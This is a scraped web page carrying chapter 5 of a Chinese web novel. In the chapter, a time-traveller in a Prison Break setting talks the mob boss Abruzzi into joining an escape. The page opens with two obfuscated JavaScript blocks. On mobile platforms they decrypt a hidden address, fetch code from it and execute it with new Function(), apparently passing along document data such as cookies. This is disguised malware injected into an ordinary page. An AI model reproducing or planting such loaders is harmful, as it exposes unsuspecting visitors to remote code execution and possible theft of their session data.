window['FkSoAs'] = function(){ var keyList = [ "V031ofKCyHuE=tzP9wIirprEtc=ezoCiSun6QjbqP9" , "vHrdf2JDUsxEKnt3he75lyz4jCXkqoBFOQabntO0gVJIXcFzbeEq8RvGWrp5Ld1a-Dml37Ki", "HVjrl9JEUW6SA+i4Y7RzwKGhndTs5Cozkc2jp/iUta7dNmh:L.Pf0gsT", "+DuvHWfRCU5xz4lj6SXLYF9eJ2-i8T7cdVlc725DJf-mRYyW68j3hHGKa4PUpFgZ0M1x", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"o=003t1Eo0uV1")], crd = x(keyList[1],"senkHnnjnBnvH"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("RAAUTzWW+U6KnJiJ44KVj7", "eudSHeuSvHdHjuljle", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}
window['QaYUrj'] = function(){ var keyList = [ "i5ZceNKsn8qlbySUgodzIv4J1ipHcvnP3u+SDztrUoeO" , "-7HE=1PJQ5pM+YuhgeXfKWRBI40m-axvnYEtUIdqf1erJPX+wcWlQV", "754=1nHTioZ6wtVlWDOJcGfQdSPBLrmAu9Rxvh0U4YKsd0/k6Jamtcyf2reNo3+pM7nLV:.BhZXOiSDP", "LSQD3gRtsHofTGva5oD3i4CM617tpu90", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"KlooIngyKoceg")], crd = x(keyList[1],"RgJHQJJIJ-J1Q"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("uwwQ=rHHZQvmnWSW11mtc6", "goHDLggHgavsvaaavs", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}
第5章 谈话_影视世界学才艺_第一版主网

影视世界学才艺- 第5章 谈话

类别:科幻小说 作者:寸夕日 书名:影视世界学才艺
    “嘿,先把水池装好,估计狱警马上就到了。”不同于迈克尔的兴奋异常,徐多艺反倒是无比沉着。

    他一把迈克尔拽了回来,同时也将他从无比亢奋的情绪中抽离出来。

    迈克尔当即冷静下来,以最快的速度将盥洗池复位并拧好了螺丝,任谁也无法从外面看出其中的玄机。

    如徐多艺所言,囚犯们的激情互喷很快惊动了狱方,监牢最顶上的大功率白炽灯被打开。

    原本伸手不见五指的牢房中,顿时亮若白昼。

    “干什么呢?大晚上的,还不老老实实睡觉!我看你们是都想被关禁闭了吧!”狱警队长贝里克骂骂咧咧地走了进来,一警棍抽在距离他最近的牢房门上。

    典狱长下班之后,贝里克就是狐狸河监狱的夜之君王,再加上他平日里心黑手毒的做派,在一众囚犯之中积威已深,故而他一出面,吵闹声便渐渐地平息了下来。

    “再有下次,所有人一起关三天紧闭!”看到众人屈服于自己的淫威之下,贝里克心满意足地点点头,放下一句狠话,随即便回去休息了。

    似乎囚犯们真的被贝里克所震慑,当灯光再次熄灭,却也无人再继续吵嚷,整个监狱陷入了死一般的寂静之中。

    见到此情此景,徐多艺心中却没有半点放松,因为他知道这是暴风雨前的宁静。

    ‘希望这帮混蛋能把这一茬忘了,把注意力都放在种族矛盾上吧。’徐多艺心中苦笑着。

    “放心,就算真的要爆发冲突,黑人这边的人数也是占据绝对优势的。再加上有我帮你,肯定没问题的。”迈克尔看穿了徐多艺的心思,拍着他的背宽慰道。

    “希望如此吧。”徐多艺勉强笑笑,他可不怎么看好迈克尔的战斗力。

    但是确如迈克尔所言,在狐狸河监狱之中,有色人种所占据的比例大大超过白人,即便白人帮发动突然袭击,徐多艺他们这一边的赢面也要更大。

    只不过一码归一码,赢面大不代表徐多艺可以放松警惕。

    相反,在即将爆发的冲突中,徐多艺必须要提起十二分的戒备,时刻小心可能暗中捅向他的黑刀。

    为此,徐多艺还需要做些额外的准备。

    于是,他在第二天主动找上了阿布鲁奇。

    “嘿,这不是前天被吓得屁滚尿流的拉丁男孩吗?”阿布鲁奇的手下们看到徐多艺后,立刻站起身来挡在他面前,同时吹着口哨嘲讽道,目光之中满是不屑。

    “约翰,我想我们需要谈谈。”徐多艺看都不看这几个五大三粗的彪形大汉一眼,盯着阿布鲁奇道。

    听到这话,阿布鲁奇先是一怔,随后微微点头,冷笑道:“好啊,那就谈吧。”

    看他漫不经心的模样,徐多艺便知道他没将自己的话放在心上。

    “事关我那室友,相信你会感兴趣的。”徐多艺淡淡道,阿布鲁奇现在心里最为惦记的便是掌握证人下落的迈克尔,用迈克尔引他上钩必是轻而易举。

    果然,一听和迈克尔有关,阿布鲁奇顿时目光一变,示意手下小弟放徐多艺过来。

    “希望你不要跟我耍什么诡计,否则你就死定了。”待徐多艺到他身边,阿布鲁奇低声威胁道。

    “明白。”面对黑老大的威胁,徐多艺心中多少有点小慌张,但是表面上还是要尽量保持着平静。

    “不过你应该不想这事被其他人听到吧。”说着,徐多艺看了看四周阿布鲁奇的小弟。

    阿布鲁奇并不担心徐多艺会对他产生什么威胁,于是便给小弟们使了个眼色,让他们与两人拉开了些许距离。

    “好了,现在你可以畅所欲言了。”阿布鲁奇紧紧盯着徐多艺道。

    “你知道迈克尔为什么会进监狱吗?”徐多艺不答反问道。

    徐多艺知道阿布鲁奇这货准备对嘴硬迈克尔用刑,原剧中更是直接剪掉了他两根脚趾。

    如此一来,越狱计划就必须暂缓。

    徐多艺觉得完全没有必要闹出这种幺蛾子,不如现在就将阿布鲁奇忽悠进他们的阵营之中。

    阿布鲁奇执掌监狱工厂,而且能从外面弄进来些许违禁品,更能在他们越狱后提供跑路服务,是越狱计划中不可或缺之人。

    在徐多艺的构想之中,此次越狱行动只需要他们四个人便足够了,其他的那些,还是老老实实蹲号子就好。

    “为什么?”阿布鲁奇不假思索地接口道,反正总不能是专门来讹他的吧。

    “他是来拯救他的哥哥,林肯·布鲁斯的。”徐多艺故作高深地一笑。

    “林肯·布鲁斯……”阿布鲁奇口中念叨着这个名字,很快便想到了此人的身份,“就是那个杀了副总统弟弟,即将坐电椅的家伙?”

    “没错。”徐多艺颌首道。

    “你说他想救人,难道他能带人越狱不成?”阿布鲁奇一下子想到了问题的关键,不敢置信地问道。

    “我想是的。”徐多艺再次点头。

    “别逗了。”阿布鲁奇忽然笑出声来,“你可知道这狐狸河监狱固若金汤,从没有人能够越狱成功,简直是异想天开。”

    “无论是不是异想天开,在他的计划成功之前,我想他都不可能告诉你你想知道的东西。”徐多艺直言不讳道。

    瞬间,阿布鲁奇的脸色阴沉下来,说道:“既然你来找我谈,想必是有了什么好主意?”

    阿布鲁奇这话说得玩味,徐多艺知道如果自己没有他口中所谓的好主意,那么今天必然是要吃不了兜着走了。

    “不如我们帮他一把,从这个鬼地方里逃出去。”徐多艺压低声音道。

    “你简直在搞笑!”阿布鲁奇的脸色愈发不善。

    “听着约翰,现在因为迈克尔掌握的东西,不只你焦头烂额,想必你外面的伙伴们同样着急上火。我说的没错吧?”徐多艺自信满满地问道。

    阿布鲁奇没有答话,不过他脸上难看的表情无疑默认了徐多艺的话。

    “迈克尔是个硬骨头,为了救哥哥甚至不惜犯罪入狱,你觉得目标没有达成之前,他可能会开口吗?”徐多艺反问。

    不等阿布鲁奇开口,徐多艺又道:“更何况,这可是个好机会啊。约翰,你入狱多久了,你对外面的小弟还有多少掌控?等你出去,你还能做回以前那个风光无限的大哥吗?”

    “你想想,如果外面那些着急上火的人用你的家人威胁你,你怎么办?他们趁机架空你,你又能怎么办?”徐多艺说这话可不是无的放矢,原剧中阿布鲁奇的黑道伙计们可就是这么干的。

    听罢徐多艺这一套连环问题,阿布鲁奇的心中已经有所动摇。

    之前探监时,另外两个黑手党头目已经对他言辞不善,他一点也不怀疑那两位的狠毒程度,用家人威胁他这种手段,他们肯定做得出来。

    “不如我们一起逃出去,去拉美逍遥自在,开启新的生活。”徐多艺的话语适时从耳边传来,宛如恶魔的低语,打开了阿布鲁奇心底的一道闸门。